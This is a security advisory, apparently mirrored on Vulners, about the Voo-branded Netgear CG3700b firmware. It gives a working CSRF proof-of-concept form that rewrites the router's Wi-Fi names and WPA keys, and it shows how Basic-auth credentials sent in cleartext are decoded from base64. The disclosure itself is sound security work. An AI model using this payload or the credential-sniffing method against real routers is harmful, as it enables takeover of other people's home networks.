Vulners
Lucene search
Voo Branded Netgear CG3700b Firmware CSRF / Authentication
`CVEs pending, screenshots and further examples available soon on my site.
Cross-Site Request Forgery (CSRF) on all form POSTs
---------------------------------------------------------------------------------
The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03)
allows a (context-dependent) attacker to perform a Cross-Site Request
Forgery (CSRF) attack on all configuration setting
(/goform/<settingspage>) page POST requests. By tricking a user into
following a specially crafted link, an attacker can modify all settings
including WEP/WPA/WPA2 keys, restore the router to factory settings, or
even upload an entire malicious configuration file.
Example:
<form method="POST" name="form0" action="http://192.168.0.1/goform/index"
<input type="hidden" name="group_parametrage_wifi" value="active">
<input type="hidden" name="reseau_wifi_name" value="NEWSSID">
<input type="hidden" name="nom_select" value="AUTO-PSK">
<input type="hidden" name="canal" value=0>
<input type="hidden" name="mot_de_passe" value="NEWWPAKEY">
<input type="hidden" name="NBandwidth" value=20>
<input type="hidden" name="group_parametrage_wifi_an" value="active">
<input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G">
<input type="hidden" name="nom_select_an" value="AUTO-PSK">
<input type="hidden" name="canal_an" value=0>
<input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G">
<input type="hidden" name="NBandwidth_an" value=20>
<input type="hidden" name="group_fon" value="desactiver">
<input type="hidden" name="buttonApply" value=1>
<input type="hidden" name="only_mode" value=0>
<input type="hidden" name="selected_ch_an" value=1>
</form>
Insufficient Authentication (OWASP-A2)
-----------------------------------------------------------
This same modem handles authentication via basic authentication over the
default (HTTP, non-ssl) connection. This allows an attacker to easily
decode the base64 encoded username and password, and authenticate to the
router. This only requires an attacker be on the same network as the
router, and sniff the clear-text traffic.
Example:
POST http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE
root@kali:~# cat voo.txt
dm9vOlBBU1NXT1JE
root@kali:~# base64 --decode voo.txt
voo:PASSWORD
Disclosure Timeline
-----------------------------
22 Jan - discovered vulnerability, initially notified vendor
23 Jan - requested CVE
7 Mar - contacted vendor again, was notified that this will not be fixed
at this time
20 April - attempted to contact Mitre again to receive CVE
21 April - sent to Full Disclosure
23 April - additional information (tentatively) posted to
http://www.doyler.net
26 April - resending to Full Disclosure due to some errors
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Apr 2016 00:00Current
0.3Low risk
Vulners AI Score0.3